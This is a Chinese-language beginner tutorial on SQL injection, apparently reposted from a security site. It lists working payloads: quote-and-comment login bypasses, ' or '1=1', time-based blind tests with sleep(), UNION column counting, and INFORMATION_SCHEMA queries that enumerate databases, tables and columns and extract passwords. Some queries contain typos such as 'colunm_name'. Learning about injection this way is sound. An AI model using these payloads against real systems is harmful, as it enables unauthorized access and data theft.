SQL注入介绍

一、SQL注入概念

1、sql注入是一种将sql代码添加到输入参数中

2、传递到sql服务器解析并执行的一种攻击手法

举例：某个网站的用户名为name=‘admin’。执行时为select name from users where name=‘admin’

则输入时输入name='' or '1=1'。实则数据库中执行的是select name from users where name='' or '1=1'则为真，用户名有效

[出自:jiwo.org]

二、SQL注入的产生

1、web开发人员无法保证所有的输入都已经过滤

2、攻击者利用发送给sql服务器的输入数据构造可执行的sql代码

3、数据库未做相应的安全配置

对于1和2两点，攻击者可以利用get请求、post请求、cookie信息、相应的http头信息等进行数据的输入而达到攻击的目的

三、寻找sql注入漏洞

1、通过构造异常而引发异常，例如：只支持整型的地方输入特殊字符来引起sql异常

2、通过get请求、post请求、cookie信息、相应的http头信息等查找敏感信息

3、检测服务器中相应的异常

四、进行sql注入攻击

1、数字注入。利用数据库中where判断语句中数字输入进行攻击。

例如：select name from users where name='' or '1=1'。结果永远为true

2、字符串注入。利用mysql的注释方法进行攻击

a、#注释的方法。

用户名的输入框中输入：admin'#，密码任意填写。

在数据库中执行的是：select * from name='admin'#'and password=xxxxx'。#后面的全部注释掉，判断的时候只判断name=admin

b、-- hdka方法，两个横杠+空格+任意字符。在执行的时候空格后面的所有被当作注释处理

用户名的输入框中输入：admin'-- ，密码任意填写。

在数据库中执行的是：select * from name='admin'-- 'and password=xxxxx'。#后面的全部注释掉，判断的时候只判断name=admin

五、注入步骤

1、找寻注入点

输入一个单引号，如果报错说明语法错误则存在注入点
执行的语句为：select xxx form xxx where x=‘‘’；

如果单引号没有反应，可尝试盲注
加时间进行尝试
X' and sleep(10) --ss'

sleep中的为时间，10即位10s
如果浏览器显示在加载中说明可能存在注册点

2、猜字段

Sql中数字可以作为字段进行匹配
因为使用union必须前后字段数量相同
' union select 1 -- '
' union select 1,2 -- '
' union select 1,2,3 -- '
...
如果前面语句中只有两个字段，但是想要获取4个其他表中字段值，使用concat
例：selcet id,name form user where = 输入框；
注入：selcet id,name form user where = ‘’ union select username,concat(password,' ',email,' ',address) from users --'

3、使用union获得其他表信息

获得当前数据库及用户信息
' union select version(),database() --'

数据库版本信息
version()
获得当前数据库名
database()

查询所有库名
'union select TABLE_SCHEMA from INFORMATION_SCHEMA.tables --'
查询表名
'union select table_name from INFORMATION_SCHEMA.tables --'
查询表名及对应的库名
'union select TABLE_SCHEMA,table_name from INFORMATION_SCHEMA.tables --'

查询数据表中的列名

'union select colunm_name from INFORMATION_SCHEMA.colunms where table_name='xxx表' --'

☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆
非学无以广才，非志无以成学
—— 定一个小目标，每天进步一点点
★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★

SQL注入介绍

评论

发表评论


顶	踩